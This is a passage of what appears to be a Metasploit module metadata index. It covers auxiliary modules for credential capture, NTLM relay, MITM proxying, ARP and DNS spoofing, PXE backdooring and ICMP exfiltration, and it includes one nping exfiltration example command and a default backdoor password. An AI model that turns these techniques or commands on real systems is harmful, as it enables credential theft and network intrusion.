"path": "/modules/auxiliary/server/capture/smb.rb",
"is_install_path": true,
"ref_name": "server/capture/smb",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/smtp": {
"name": "Authentication Capture: SMTP",
"full_name": "auxiliary/server/capture/smtp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"ddz <ddz@theta44.org>",
"hdm <x@hdm.io>"
],
"description": "This module provides a fake SMTP service that\n is designed to capture authentication credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-04-20 16:34:51 +0000",
"path": "/modules/auxiliary/server/capture/smtp.rb",
"is_install_path": true,
"ref_name": "server/capture/smtp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/telnet": {
"name": "Authentication Capture: Telnet",
"full_name": "auxiliary/server/capture/telnet",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "This module provides a fake Telnet service that\n is designed to capture authentication credentials. DONTs\n and WONTs are sent to the client for all option negotiations,\n except for ECHO at the time of the password prompt since\n the server controls that for a bit more realism.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-04-20 16:02:33 +0000",
"path": "/modules/auxiliary/server/capture/telnet.rb",
"is_install_path": true,
"ref_name": "server/capture/telnet",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/capture/vnc": {
"name": "Authentication Capture: VNC",
"full_name": "auxiliary/server/capture/vnc",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Patrik Karlsson <patrik@cqure.net>"
],
"description": "This module provides a fake VNC service that\n is designed to capture authentication credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-11-15 17:01:52 +0000",
"path": "/modules/auxiliary/server/capture/vnc.rb",
"is_install_path": true,
"ref_name": "server/capture/vnc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/dhclient_bash_env": {
"name": "DHCP Client Bash Environment Variable Code Injection (Shellshock)",
"full_name": "auxiliary/server/dhclient_bash_env",
"rank": 300,
"disclosure_date": "2014-09-24",
"type": "auxiliary",
"author": [
"scriptjunkie",
"apconole <apconole@yahoo.com>",
"Stephane Chazelas",
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "This module exploits the Shellshock vulnerability, a flaw in how the Bash shell\n handles external environment variables. This module targets dhclient by responding\n to DHCP requests with a malicious hostname, domainname, and URL which are then\n passed to the configuration scripts as environment variables, resulting in code\n execution.",
"references": [
"CVE-2014-6271",
"CWE-94",
"OSVDB-112004",
"EDB-34765",
"URL-https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/",
"URL-https://seclists.org/oss-sec/2014/q3/649",
"URL-https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-17 22:29:20 +0000",
"path": "/modules/auxiliary/server/dhclient_bash_env.rb",
"is_install_path": true,
"ref_name": "server/dhclient_bash_env",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"Shellshock"
]
}
},
"auxiliary_server/dhcp": {
"name": "DHCP Server",
"full_name": "auxiliary/server/dhcp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"scriptjunkie",
"apconole <apconole@yahoo.com>"
],
"description": "This module provides a DHCP service",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/dhcp.rb",
"is_install_path": true,
"ref_name": "server/dhcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/dns/native_server": {
"name": "Native DNS Server (Example)",
"full_name": "auxiliary/server/dns/native_server",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"RageLtMan <rageltman@sempervictus>"
],
"description": "This module provides a Rex based DNS service which can store static entries,\n resolve names over pivots, and serve DNS requests across routed session comms.\n DNS tunnels can operate across the Rex switchboard, and other DNS modules\n can use this as a template. Setting static records via hostfile allows for DNS\n spoofing attacks without direct traffic manipulation at the handlers. Handlers\n for requests and responses provided here mimic the internal Rex functionality,\n but utilize methods within this module's namespace to output content processed\n in the Proc contexts via vprint_status.",
"references": [
],
"platform": "",
"arch": "",
"rport": 53,
"autofilter_ports": [
53
],
"autofilter_services": [
"dns"
],
"targets": null,
"mod_time": "2018-01-22 23:37:39 +0000",
"path": "/modules/auxiliary/server/dns/native_server.rb",
"is_install_path": true,
"ref_name": "server/dns/native_server",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/dns/spoofhelper": {
"name": "DNS Spoofing Helper Service",
"full_name": "auxiliary/server/dns/spoofhelper",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"ddz <ddz@theta44.org>"
],
"description": "This module provides a DNS service that returns TXT\n records indicating information about the querying service.\n Based on Dino Dai Zovi's DNS code from Karma.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/dns/spoofhelper.rb",
"is_install_path": true,
"ref_name": "server/dns/spoofhelper",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/fakedns": {
"name": "Fake DNS Service",
"full_name": "auxiliary/server/fakedns",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"ddz <ddz@theta44.org>",
"hdm <x@hdm.io>",
"fozavci"
],
"description": "This module provides a DNS service that redirects\n all queries to a particular address.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/fakedns.rb",
"is_install_path": true,
"ref_name": "server/fakedns",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/ftp": {
"name": "FTP File Server",
"full_name": "auxiliary/server/ftp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module provides an FTP service",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/ftp.rb",
"is_install_path": true,
"ref_name": "server/ftp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/http_ntlmrelay": {
"name": "HTTP Client MS Credential Relayer",
"full_name": "auxiliary/server/http_ntlmrelay",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Rich Lundeen <richard.lundeen@gmail.com>"
],
"description": "This module relays negotiated NTLM Credentials from an HTTP server to multiple\n protocols. Currently, this module supports relaying to SMB and HTTP.\n\n Complicated custom attacks requiring multiple requests that depend on each\n other can be written using the SYNC* options. For example, a CSRF-style\n attack might first set an HTTP_GET request with a unique SYNCID and set\n an HTTP_POST request with a SYNCFILE, which contains logic to look\n through the database and parse out important values, such as the CSRF token\n or authentication cookies, setting these as configuration options, and finally\n create a web page with iframe elements pointing at the HTTP_GET and HTTP_POSTs.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-18 11:33:48 +0000",
"path": "/modules/auxiliary/server/http_ntlmrelay.rb",
"is_install_path": true,
"ref_name": "server/http_ntlmrelay",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/icmp_exfil": {
"name": "ICMP Exfiltration Service",
"full_name": "auxiliary/server/icmp_exfil",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module is designed to provide a server-side component to receive and store files\n exfiltrated over ICMP echo request packets.\n\n To use this module you will need to send an initial ICMP echo request containing the\n specific start trigger (defaults to '^BOF'); this can be followed by the filename being sent (or\n a random filename can be assigned). All data received from this source will automatically\n be added to the receive buffer until an ICMP echo request containing a specific end trigger\n (defaults to '^EOL') is received.\n\n Suggested Client:\n Data can be sent from the client using a variety of tools. One such example is nping (included\n with the NMAP suite of tools) - usage: nping --icmp 10.0.0.1 --data-string \"BOFtest.txt\" -c1",
"references": [
"URL-https://github.com/todb/packetfu",
"URL-http://nmap.org/book/nping-man.html",
"URL-http://blog.c22.cc/2012/02/17/quick-post-fun-with-python-ctypes-simpleicmp/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-10-31 04:53:14 +0000",
"path": "/modules/auxiliary/server/icmp_exfil.rb",
"is_install_path": true,
"ref_name": "server/icmp_exfil",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/jsse_skiptls_mitm_proxy": {
"name": "Java Secure Socket Extension (JSSE) SKIP-TLS MITM Proxy",
"full_name": "auxiliary/server/jsse_skiptls_mitm_proxy",
"rank": 300,
"disclosure_date": "2015-01-20",
"type": "auxiliary",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "This module exploits an incomplete internal state distinction in Java Secure\n Socket Extension (JSSE) by impersonating the server and finishing the\n handshake before the peers have authenticated themselves and instantiated\n negotiated security parameters, resulting in a plaintext SSL/TLS session\n with the client. This plaintext SSL/TLS session is then proxied to the\n server using a second SSL/TLS session from the proxy to the server (or an\n alternate fake server) allowing the session to continue normally and\n plaintext application data transmitted between the peers to be saved. This\n module requires an active man-in-the-middle attack.",
"references": [
"CVE-2014-6593",
"CWE-372",
"URL-https://www.smacktls.com/#skip",
"URL-https://www.smacktls.com/smack.pdf",
"URL-http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html",
"URL-https://www-304.ibm.com/support/docview.wss?uid=swg21695474"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb",
"is_install_path": true,
"ref_name": "server/jsse_skiptls_mitm_proxy",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/local_hwbridge": {
"name": "Hardware Bridge Server",
"full_name": "auxiliary/server/local_hwbridge",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Craig Smith"
],
"description": "This module sets up a web server to bridge communications between\n Metasploit and physically attached hardware.\n Currently this module supports: automotive",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-09-14 09:28:38 +0000",
"path": "/modules/auxiliary/server/local_hwbridge.rb",
"is_install_path": true,
"ref_name": "server/local_hwbridge",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/ms15_134_mcl_leak": {
"name": "MS15-134 Microsoft Windows Media Center MCL Information Disclosure",
"full_name": "auxiliary/server/ms15_134_mcl_leak",
"rank": 300,
"disclosure_date": "2015-12-08",
"type": "auxiliary",
"author": [
"Francisco Falcon",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Windows Media Center. It allows an MCL\n file to render itself as an HTML document in the local machine zone by Internet Explorer,\n which can be used to leak files on the target machine.\n\n Please be aware that if this exploit is used against a patched Windows, it can cause the\n computer to be very slow or unresponsive (100% CPU). It seems to be related to how the\n exploit uses the URL attribute in order to render itself as an HTML file.",
"references": [
"CVE-2015-6127",
"MSB-MS15-134",
"URL-https://blog.coresecurity.com/2015/12/09/exploiting-windows-media-center/",
"URL-http://www.coresecurity.com/advisories/microsoft-windows-media-center-link-file-incorrectly-resolved-reference"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/ms15_134_mcl_leak.rb",
"is_install_path": true,
"ref_name": "server/ms15_134_mcl_leak",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/netbios_spoof_nat": {
"name": "NetBIOS Response \"BadTunnel\" Brute Force Spoof (NAT Tunnel)",
"full_name": "auxiliary/server/netbios_spoof_nat",
"rank": 300,
"disclosure_date": "2016-06-14",
"type": "auxiliary",
"author": [
"vvalien",
"hdm <x@hdm.io>",
"tombkeeper"
],
"description": "This module listens for a NetBIOS name request and then continuously spams\n NetBIOS responses to a target for a given hostname, causing the target to cache\n a malicious address for this name. On high-speed networks, the PPSRATE value\n should be increased to speed up this attack. As an example, a value of around\n 30,000 is almost 100% successful when spoofing a response for a 'WPAD' lookup.\n Distant targets may require more time and lower rates for a successful attack.\n\n This module works when the target is behind a NAT gateway, since the stream of\n NetBIOS responses will keep the NAT mapping alive after the initial setup. To\n trigger the initial NetBIOS request to the Metasploit system, force the target\n to access a UNC link pointing to the same address (HTML, Office attachment, etc).\n\n This NAT-piercing issue was named the 'BadTunnel' vulnerability by the discoverer,\n Yu Yang (@tombkeeper). The Microsoft patches (MS16-063/MS16-077) impact the way\n that the proxy (WPAD) host is identified, but do change the predictability\n of NetBIOS requests.",
"references": [
"URL-http://xlab.tencent.com/en/2016/06/17/BadTunnel-A-New-Hope/",
"CVE-2016-3213",
"MSB-MS16-063",
"CVE-2016-3236",
"MSB-MS16-077"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/netbios_spoof_nat.rb",
"is_install_path": true,
"ref_name": "server/netbios_spoof_nat",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/openssl_altchainsforgery_mitm_proxy": {
"name": "OpenSSL Alternative Chains Certificate Forgery MITM Proxy",
"full_name": "auxiliary/server/openssl_altchainsforgery_mitm_proxy",
"rank": 300,
"disclosure_date": "2015-07-09",
"type": "auxiliary",
"author": [
"David Benjamin",
"Adam Langley",
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "This module exploits a logic error in OpenSSL by impersonating the server\n and sending a specially-crafted chain of certificates, resulting in\n certain checks on untrusted certificates being bypassed on the client,\n allowing it to use a valid leaf certificate as a CA certificate to sign a\n fake certificate. The SSL/TLS session is then proxied to the server,\n allowing the session to continue normally and application data transmitted\n between the peers to be saved.\n\n The valid leaf certificate must not contain the keyUsage extension, or it\n must have at least the keyCertSign bit set (see the X509_check_issued function\n in crypto/x509v3/v3_purp.c); otherwise, X509_verify_cert fails with\n X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT_LOCALLY. This module requires an\n active man-in-the-middle attack.",
"references": [
"CVE-2015-1793",
"CWE-754",
"URL-http://git.openssl.org/?p=openssl.git;a=commit;h=f404943bcab4898d18f3ac1b36479d1d7bbbb9e6"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb",
"is_install_path": true,
"ref_name": "server/openssl_altchainsforgery_mitm_proxy",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/openssl_heartbeat_client_memory": {
"name": "OpenSSL Heartbeat (Heartbleed) Client Memory Exposure",
"full_name": "auxiliary/server/openssl_heartbeat_client_memory",
"rank": 300,
"disclosure_date": "2014-04-07",
"type": "auxiliary",
"author": [
"Neel Mehta",
"Riku",
"Antti",
"Matti",
"hdm <x@hdm.io>"
],
"description": "This module provides a fake SSL service that is intended to\n leak memory from client systems as they connect. This module is\n hardcoded for using the AES-128-CBC-SHA1 cipher.",
"references": [
"CVE-2014-0160",
"US-CERT-VU-720951",
"URL-https://www.us-cert.gov/ncas/alerts/TA14-098A",
"URL-http://heartbleed.com/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-08-27 13:11:22 +0000",
"path": "/modules/auxiliary/server/openssl_heartbeat_client_memory.rb",
"is_install_path": true,
"ref_name": "server/openssl_heartbeat_client_memory",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"Heartbleed"
]
}
},
"auxiliary_server/pxeexploit": {
"name": "PXE Boot Exploit Server",
"full_name": "auxiliary/server/pxeexploit",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"scriptjunkie"
],
"description": "This module provides a PXE server, running a DHCP and TFTP server.\n The default configuration loads a Linux kernel and initrd into memory that\n reads the hard drive, placing a payload to install metsvc, disable the\n firewall, and add a new user metasploit on any Windows partition seen,\n and add a uid 0 user with username and password metasploit to any Linux\n partition seen. The Windows user will have the password p@SSw0rd!123456\n (in case of complexity requirements) and will be added to the administrators\n group.\n\n Note: the displayed IP address of a target is the address this DHCP server\n handed out, not the \"normal\" IP address the host uses.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/pxeexploit.rb",
"is_install_path": true,
"ref_name": "server/pxeexploit",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/regsvr32_command_delivery_server": {
"name": "Regsvr32.exe (.sct) Command Delivery Server",
"full_name": "auxiliary/server/regsvr32_command_delivery_server",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Casey Smith",
"Trenton Ivey",
"mubix <mubix@hak5.org>"
],
"description": "This module uses the Regsvr32.exe Application Whitelisting Bypass technique as a way to run a command on\n a target system. The major advantage of this technique is that you can execute a static command on the target\n system and dynamically and remotely change the command that will actually run (by changing the value of CMD).\n This is useful when combined with persistence methods (e.g., a recurring scheduled task) or when flexibility\n is needed through the use of a single command (e.g., as Rubber Ducky payload).",
"references": [
"URL-http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/regsvr32_command_delivery_server.rb",
"is_install_path": true,
"ref_name": "server/regsvr32_command_delivery_server",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/socks4a": {
"name": "Socks4a Proxy Server",
"full_name": "auxiliary/server/socks4a",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "This module provides a socks4a proxy server that uses the builtin Metasploit routing to relay connections.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/socks4a.rb",
"is_install_path": true,
"ref_name": "server/socks4a",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/socks5": {
"name": "Socks5 Proxy Server",
"full_name": "auxiliary/server/socks5",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"Spencer McIntyre",
"surefire"
],
"description": "This module provides a socks5 proxy server that uses the builtin\n Metasploit routing to relay connections.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-05-26 13:46:00 +0000",
"path": "/modules/auxiliary/server/socks5.rb",
"is_install_path": true,
"ref_name": "server/socks5",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/socks_unc": {
"name": "SOCKS Proxy UNC Path Redirection",
"full_name": "auxiliary/server/socks_unc",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module provides a Socks proxy service\n that redirects all HTTP requests to a web page that\n loads a UNC path.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/socks_unc.rb",
"is_install_path": true,
"ref_name": "server/socks_unc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/tftp": {
"name": "TFTP File Server",
"full_name": "auxiliary/server/tftp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"jduck <jduck@metasploit.com>",
"todb <todb@metasploit.com>"
],
"description": "This module provides a TFTP service",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/tftp.rb",
"is_install_path": true,
"ref_name": "server/tftp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/webkit_xslt_dropper": {
"name": "Cross Platform Webkit File Dropper",
"full_name": "auxiliary/server/webkit_xslt_dropper",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nicolas Gregoire"
],
"description": "This module exploits a XSLT vulnerability in Webkit to drop ASCII or UTF-8\n files to the target file-system. By default, the file will be dropped in\n C:\\Program Files\\",
"references": [
"CVE-2011-1774"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/server/webkit_xslt_dropper.rb",
"is_install_path": true,
"ref_name": "server/webkit_xslt_dropper",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/wget_symlink_file_write": {
"name": "GNU Wget FTP Symlink Arbitrary Filesystem Access",
"full_name": "auxiliary/server/wget_symlink_file_write",
"rank": 300,
"disclosure_date": "2014-10-27",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a vulnerability in Wget when used in\n recursive (-r) mode with a FTP server as a destination. A\n symlink is used to allow arbitrary writes to the target's\n filesystem. To specify content for the file, use the\n \"file:/path\" syntax for the TARGET_DATA option.\n\n Tested successfully with wget 1.14. Versions prior to 1.16\n are presumed vulnerable.",
"references": [
"CVE-2014-4877",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=1139181",
"URL-https://community.rapid7.com/community/metasploit/blog/2014/10/28/r7-2014-15-gnu-wget-ftp-symlink-arbitrary-filesystem-access"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/wget_symlink_file_write.rb",
"is_install_path": true,
"ref_name": "server/wget_symlink_file_write",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_server/wpad": {
"name": "WPAD.dat File Server",
"full_name": "auxiliary/server/wpad",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module generates a valid wpad.dat file for WPAD mitm\n attacks. Usually this module is used in combination with DNS attacks\n or the 'NetBIOS Name Service Spoofer' module. Please remember that, as the\n server will be running by default on TCP port 80, you will need the\n required privileges to open that port.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/server/wpad.rb",
"is_install_path": true,
"ref_name": "server/wpad",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_sniffer/psnuffle": {
"name": "pSnuffle Packet Sniffer",
"full_name": "auxiliary/sniffer/psnuffle",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Max Moser <mmo@remote-exploit.org>"
],
"description": "This module sniffs passwords like dsniff did in the past",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/sniffer/psnuffle.rb",
"is_install_path": true,
"ref_name": "sniffer/psnuffle",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_spoof/arp/arp_poisoning": {
"name": "ARP Spoof",
"full_name": "auxiliary/spoof/arp/arp_poisoning",
"rank": 300,
"disclosure_date": "1999-12-22",
"type": "auxiliary",
"author": [
"amaloteaux <alex_maloteaux@metasploit.com>"
],
"description": "Spoof ARP replies and poison remote ARP caches to conduct IP address spoofing or a denial of service.",
"references": [
"OSVDB-11169",
"CVE-1999-0667",
"URL-http://en.wikipedia.org/wiki/ARP_spoofing"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-10-31 04:53:14 +0000",
"path": "/modules/auxiliary/spoof/arp/arp_poisoning.rb",
"is_install_path": true,
"ref_name": "spoof/arp/arp_poisoning",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_spoof/cisco/cdp": {
"name": "Send Cisco Discovery Protocol (CDP) Packets",
"full_name": "auxiliary/spoof/cisco/cdp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Fatih Ozavci"
],
"description": "This module sends Cisco Discovery Protocol (CDP) packets. Note that any responses\n to the CDP packets broadcast from this module will need to be analyzed with an\n external packet analysis tool, such as tcpdump or Wireshark in order to learn more\n about the Cisco switch and router environment.",
"references": [
"URL-http://en.wikipedia.org/wiki/CDP_Spoofing"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/spoof/cisco/cdp.rb",
"is_install_path": true,
"ref_name": "spoof/cisco/cdp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_spoof/cisco/dtp": {
"name": "Forge Cisco DTP Packets",
"full_name": "auxiliary/spoof/cisco/dtp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Spencer McIntyre"
],
"description": "This module forges DTP packets to initialize a trunk port.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/spoof/cisco/dtp.rb",
"is_install_path": true,
"ref_name": "spoof/cisco/dtp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_spoof/dns/bailiwicked_domain": {
"name": "DNS BailiWicked Domain Attack",
"full_name": "auxiliary/spoof/dns/bailiwicked_domain",
"rank": 300,
"disclosure_date": "2008-07-21",
"type": "auxiliary",
"author": [
"I)ruid <druid@caughq.org>",
"hdm <x@hdm.io>",
"Cedric Blancher <sid@rstack.org>"
],
"description": "This exploit attacks a fairly ubiquitous flaw in DNS implementations which\n Dan Kaminsky found and disclosed ~Jul 2008. This exploit replaces the target\n domain's nameserver entries in a vulnerable DNS cache server. This attack works\n by sending random hostname queries to the target DNS server coupled with spoofed\n replies to those queries from the authoritative nameservers for that domain.\n Eventually, a guessed ID will match, the spoofed packet will get accepted, and\n the nameserver entries for the target domain will be replaced by the server\n specified in the NEWDNS option of this exploit.",
"references": [
"CVE-2008-1447",
"OSVDB-46776",
"US-CERT-VU-800113",
"URL-http://www.caughq.org/exploits/CAU-EX-2008-0003.txt"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/spoof/dns/bailiwicked_domain.rb",
"is_install_path": true,
"ref_name": "spoof/dns/bailiwicked_domain",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_spoof/dns/bailiwicked_host": {
"name": "DNS BailiWicked Host Attack",
"full_name": "auxiliary/spoof/dns/bailiwicked_host",
"rank": 300,
"disclosure_date": "2008-07-21",
"type": "auxiliary",
"author": [
"I)ruid <druid@caughq.org>",
"hdm <x@hdm.io>"
],
"description": "This exploit attacks a fairly ubiquitous flaw in DNS implementations which\n Dan Kaminsky found and disclosed ~Jul 2008. This exploit caches a single\n malicious host entry into the target nameserver by sending random hostname\n queries to the target DNS server coupled with spoofed replies to those\n queries from the authoritative nameservers for that domain. Eventually, a\n guessed ID will match, the spoofed packet will get accepted, and due to the\n additional hostname entry being within bailiwick constraints of the original\n request the malicious host entry will get cached.",
"references": [
"CVE-2008-1447",
"OSVDB-46776",
"US-CERT-VU-800113",
"URL-http://www.caughq.org/exploits/CAU-EX-2008-0002.txt"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/spoof/dns/bailiwicked_host.rb",
"is_install_path": true,
"ref_name": "spoof/dns/bailiwicked_host",
